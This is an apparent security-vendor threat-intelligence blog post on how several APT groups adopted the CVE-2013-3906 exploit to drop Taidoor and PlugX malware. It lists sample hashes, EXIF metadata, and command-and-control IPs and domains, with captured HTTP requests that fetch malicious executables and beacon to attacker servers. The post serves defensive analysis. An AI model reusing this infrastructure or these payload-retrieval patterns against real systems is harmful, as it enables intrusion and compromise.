Jump to content

Blog

Shield

Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906

Last week, we blogged about a zero-day vulnerability (CVE-2013-3906) that was being used by at least two different threat groups. Although it was the same exploit, the two groups deployed it differently and dropped very different payloads. One group, known as Hangover, engages in targeted attacks, usually, against targets in Pakistan. The second group, known as Arx, used the exploit to spread the Citadel Trojan, and we have found that they are also using the Napolar (aka Solar) malware. [1]

Looking at the time of the first known use of the exploit, we noted that the Arx group appeared to have had access to this exploit prior to the Hangover group. Subsequent research by Kaspersky has found that this exploit was used in July 2013 to spread a cross-platform malware known as Janicab. Interestingly, the Janicab samples have exactly the same CreateDate and ModifyDate as the Arx samples. However, the ZipModifyDate is different. They also contain the same embedded TIFF file (aa6d23cd23b98be964c992a1b048df6f).

While the Janicab activity dates the use of CVE-2013-3906 to July, other groups, including those associated with advanced persistent threat (APT) activity, have now begun to use this exploit as well. We have found that CVE-2013-3906 is now being used to drop Taidoor and PlugX (which we call Backdoor.APT.Kaba). Interestingly, the version of the exploit used contains elements that are consistent with the Hangover implementation. Both the Taidoor and PlugX samples have EXIF data that is consistent with a Hangover sample. In addition, the samples share the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1).

Taidoor

The Taidoor malware has been used in numerous targeted attacks that typically affect Taiwan-related entities. We recently blogged about modifications that have been made to the Taidoor malware. This new version of Taidoor is being dropped by malicious documents using the CVE-2013-3906 exploit. The malware is being distributed via an email purporting to be from a Taiwanese government email address.

taidooremail

The Taidoor sample we analyzed (6003b22d22af86026afe62c39316b9e0) has the same CreateDate and ModifyDate as the Hangover samples we analyzed. It also shares an exact ZipModifyDate with one of the Hangover samples. (There are variations in the ZipModifyDate among the Hangover samples).

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

It also contains other EXIF data that matches a Hangover sample (and the PlugX sample discussed below):

  • App Version                     : 12.0000
  • Creator                            : Win7
  • Last Modified By              : Win7
  • Revision Number             : 1

The sample also contains the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1). This indicates that they were probably built with the same weaponizer tool.

After the exploit is triggered a connection is made to a retrieve an EXE from a webserver:

GET /o.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)
Host: 202.81.251.205
Connection: Keep-Alive

This EXE is Taidoor and it is configured to beacon to two command and control (CnC) servers: 58.26.15.106 and 81.10.28.171.

GET /user.jsp?ij=oumded191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 58.26.15.106
Connection: Keep-Alive
Cache-Control: no-cache

GET /parse.jsp?js=iwmnxw191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 81.10.28.171
Connection: Keep-Alive
Cache-Control: no-cache

We have located an additional sample (5c8d7d4dd6cc8e3b0bd6587221c52102) that also retrieves Taidoor:

GET /suv/update.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)
Host: 118.175.7.74
Connection: Keep-Alive

This sample beacons to the command and control server: accountcreditbalance.accountcreditbalance.trickip.net (118.175.7.74).

GET /parse.jsp?ne=vyhavf191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: accountcreditbalance.accountcreditbalance.trickip.net
Connection: Keep-Alive
Cache-Control: no-cache

PlugX (Kaba)

The PlugX malware (aka Backdoor.APT.Kaba) has been used in a variety of targeted attacks. We located a malicious document (80c8ce1fd7622391cac892be4dbec56b) that exploits CVE-2013-3906. This sample contains the same CreateDate and ModifyDate and shares a common ZipModifyDate with both the Taidoor samples and one of the Hangover samples.

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

After exploitation, there is a connection to auto.bacguarp.com (210.56.63.38) that downloads a PlugX executable:

GET /css/css.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)
Host: auto.bacguarp.com

The malware (423eaeff2a4576365343e6dc35d22042) begins to beacon to web.bacguarp.com and web.zuesinfo.com, which both resolve to 210.56.63.60. The callback of the PlugX samples is:

POST /8A8DAEE657205D651405D7CD HTTP/1.1
Accept: */*
FZLK1: 0
FZLK2: 0
FZLK3: 61456
FZLK4: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: web.bacguarp.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Conclusion

An increasing number of threat groups now have access to CVE-2013-3906. These threat groups include those that use the Taidoor and PlugX malware families to conduct targeted attacks. We expect this exploit to continue to proliferate among threat groups engaged in APT activity.

Notes

1.  The MD5 hashes for Arx group samples that dropped Napolar are:  5e4b83fd11050075a2d4913e6d81e553  and f6c788916cf6fafa202494658e0fe4ae. The CnC server was: www.gagadude.biz / 176.119.2.90